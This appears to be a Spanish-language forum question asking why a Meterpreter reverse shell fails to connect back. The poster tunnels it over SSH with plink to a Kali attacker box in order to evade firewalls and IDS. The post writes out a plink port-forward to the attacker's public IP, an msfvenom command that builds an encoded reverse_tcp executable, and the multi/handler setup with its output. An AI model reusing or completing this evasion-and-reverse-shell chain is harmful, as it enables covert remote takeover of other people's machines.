así que estoy tratando de seguir este tutorial para omitir los firewalls y los IDS enrutan el tráfico a través de una tubería SSH y reciben una shell invertida Meterpreter (reverse_tcp) desde una computadora con Windows a través de Internet. Sin embargo, este tutorial está bastante desactualizado, por lo que parece que he encontrado un obstáculo.
Aquí es donde estoy ahora:
plink -L 6666:mypublicattackerip:6666 mypublicattackerip -l sshuser -pw hssuser1
Esta es mi salida del siguiente comando ejecutado en un indicador de comando: ("Almacenar clave en caché" no se muestra porque lo he ejecutado antes)
Using username "sshuser".
The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Apr 6 10:33:46 2018 from .. snip ..
]0;sshuser@kali: ~[01;31msshuser@kali[00m:[01;34m~[00m$
Obtengo un shell interactivo (pero también deformado) de mi caja Kali que no aparece en el tutorial, pero el netstat -anop tcp | findstr 6666
parece idéntico al que se muestra en el tutorial, así que continúo.
TCP 127.0.0.1:6666 0.0.0.0:0 LISTENING 12828
Así que configuré un Meterpreter multi/handler
para windows/meterpreter/reverse_tcp
con el LHOST
establecido en la dirección IP pública de mi atacante, el LPORT
establecido en 6666
y escribí exploit
.
Luego ejecuté el shell inverso de Meterpreter generado con la misma línea de comando utilizada en el tutorial
msfvenom -p windows/meterpreter/reverse_tcp -a x86 LHOST=127.0.0.1 LPORT=6666 --encoder x86/shikata_ga_nai -b'\x00' --format exe > reverse_tcpPlink6666Encoded.exe
con Plink conectado al igual que mi manejador escuchando y he aquí que no obtengo ninguna conexión con mi caja Kali.
msf exploit(multi/handler) > exploit
[-] Handler failed to bind to mypublicattackerip:6666:- -
[*] Started reverse TCP handler on 0.0.0.0:6666
.. no sessions ..
Sin embargo, puedo ver en Process Explorer que:
A. El proceso reverse_tcpPlink6666Encoded.exe
es y sigue vivo y eso
B. Si voy a la pestaña TCP / IP para ese proceso, confirma que ha establecido correctamente una conexión con algo:
y eso es todo.
Esto es lo que netstat
tiene que decir sobre todo esto:
TCP 127.0.0.1:6666 0.0.0.0:0 LISTENING 17820
TCP 127.0.0.1:6666 127.0.0.1:55223 ESTABLISHED 17820
TCP 127.0.0.1:55223 127.0.0.1:6666 ESTABLISHED 14568
Para resumir, no estoy seguro de por qué no obtengo una conexión de shell inversa con mi nodo Kali después de todo esto.
Gracias como siempre.